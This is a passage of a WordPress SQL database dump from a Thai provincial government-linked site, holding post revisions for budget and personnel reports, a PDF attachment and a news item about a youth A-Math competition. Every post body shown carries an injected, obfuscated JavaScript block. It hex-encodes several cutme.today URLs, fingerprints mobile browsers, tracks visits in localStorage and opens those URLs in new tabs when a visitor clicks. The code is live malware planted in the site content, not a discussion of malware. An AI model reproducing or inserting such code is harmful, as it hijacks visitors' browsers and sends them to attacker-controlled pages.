)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','closed','closed','','824-revision-v1','','','2024-09-01 20:54:02','2024-09-01 13:54:02','',824,'http://pakhaeng.ssk.in.th/?p=1087',0,'revision','',0),
(1088,1,'2024-09-01 21:09:02','2024-09-01 14:09:02','','รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%b1-2','','','2024-09-01 21:09:02','2024-09-01 14:09:02','',1003,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf',0,'attachment','application/pdf',0),
(1089,1,'2024-09-01 21:09:22','2024-09-01 14:09:22','<!-- wp:file {\"id\":1088,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-d4b9de4c-5436-4320-aec8-20d85e2b52aa\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d4b9de4c-5436-4320-aec8-20d85e2b52aa\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี','','inherit','closed','closed','','1003-revision-v1','','','2024-09-01 21:09:22','2024-09-01 14:09:22','',1003,'http://pakhaeng.ssk.in.th/?p=1089',0,'revision','',0),
(1090,1,'2024-09-02 10:59:04','2024-09-02 03:59:04','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":4} -->\n<h4 class=\"wp-block-heading\">อบจ.ศรีสะเกษ จัดการแข่งขันเอแม็ท (A-Math) เกมต่อสมการคณิตศาสตร์ ประจำปีงบประมาณ 2567 โดย นายวิชิต_ไตรสรณกุล นายกองค์การบริหารส่วนจังหวัดศรีสะเกษ มอบหมายให้นายอภิศักดิ์ แซ่จึง รองนายกองค์การบริหารส่วนจังหวัดศรีสะเกษ เป็นประธานเปิดโครงการ การแข่งขันเอแม็ท (A-Math) ประจำปีงบประมาณ 2567 วันที่ 31 สิงหาคม 2567 เวลา 09.00 น. ณ หอประชุมเฉลิมพระเกียรติฯ เกาะกลางน้ำห้วยน้ำคำเทศบาลเมืองศรีสะเกษ อำเภอเมืองฯ จังหวัดศรีสะเกษ โดยมี นางอุษนีพร สุมาจักร์ หัวหน้าฝ่ายส่งเสริมการศึกษา ศาสนาและวัฒนธรรม พร้อมด้วย ข้าราชการ ครู บุคลากรทางการศึกษา เจ้าหน้าที่ และนักเรียนสังกัดองค์การบริหารส่วนจังหวัดศรีสะเกษ เข้าร่วมพิธีเปิดในครั้งนี้</h4>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>นายอภิศักดิ์ แซ่จึง รองนายกองค์การบริหารส่วนจังหวัดรีสะเกษ กล่าวว่า องค์การบริหารส่วนจังหวัดศรีสะเกษได้กำหนดจัด โครงการการแข่งขันเอแม็ท (A-MATH) ประจำปีงบประมาณ 2567 โดยมีวัตถุประสงค์ในการจัดโครงการนี้คือ เพื่อให้เด็กเยาวชนและประชาชนได้มีโอกาสเสริมทักษะทางด้านคณิตศาสตร์ให้แก่ผู้เรียนด้วยผ่านกิจกรรมการแข่งขันเอแม็ท และใช้เวลาว่างให้เกิดประโยชน์ต่อตนเองครอบครัวและชุมชน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>กลุ่มเป้าหมายจำนวนทั้งสิ้น 810 คน เป็นเด็ก เยาวชน และประชาชนในจังหวัดศรีสะเกษ และจังหวัดอื่นๆ ทั่วประเทศ แบ่งการแข่งขันเป็น 4 ประเภท</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทมัธยมศึกษาตอนปลาย จำนวน 185 คน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทประถมศึกษา 104 ทีม จำนวน 208 คน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทมัธยมศึกษาตอน 190 ทีม จำนวน 382 คน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1092,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/5BB0E853-00AB-45DF-8A20-DA4D3A06A120-1024x576.jpg\" alt=\"\" class=\"wp-image-1092\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1097,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/471BF694-20D7-486D-A69A-0329EB0C5B7E-1024x576.jpg\" alt=\"\" class=\"wp-image-1097\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1093,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/92409712-D1C5-441A-B3CF-46BBEB11306B-1024x576.jpg\" alt=\"\" class=\"wp-image-1093\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1096,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/89E33FD3-BD14-4973-B501-053D0C4343C4-1024x576.jpg\" alt=\"\" class=\"wp-image-1096\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1094,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3D568C24-BF80-4BF6-952F-A61B9BB91A08-1024x576.jpg\" alt=\"\" class=\"wp-image-1094\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1095,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-1024x576.jpg\" alt=\"\" class=\"wp-image-1095\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1098,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550086_0-1.jpg\" alt=\"\" class=\"wp-image-1098\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1099,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550088_0.jpg\" alt=\"\" class=\"wp-image-1099\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1100,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550089_0.jpg\" alt=\"\" class=\"wp-image-1100\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 